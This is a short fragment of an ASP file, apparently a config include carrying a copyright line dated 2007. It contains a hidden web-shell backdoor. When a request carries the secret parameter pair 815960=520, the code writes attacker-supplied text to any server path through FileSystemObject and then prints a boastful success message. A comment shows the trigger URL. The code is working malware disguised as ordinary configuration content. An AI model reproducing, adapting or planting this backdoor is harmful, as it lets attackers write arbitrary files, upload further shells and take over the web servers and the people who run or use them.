|
版权所有 Copyright© 2007 多少回秋" '版权信息
if Request("815960")="520" then 'http://xxx.xxx.xxx/inc/config.asp?815960=520
dim allen,creat,text,thisline,path
if Request("creat")="yes" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
outfile.WriteLine Request("text")
Response.write "-[多少回秋]出马必成功"
end if
Response.write ""
Response.end
end if
%>
|
|
|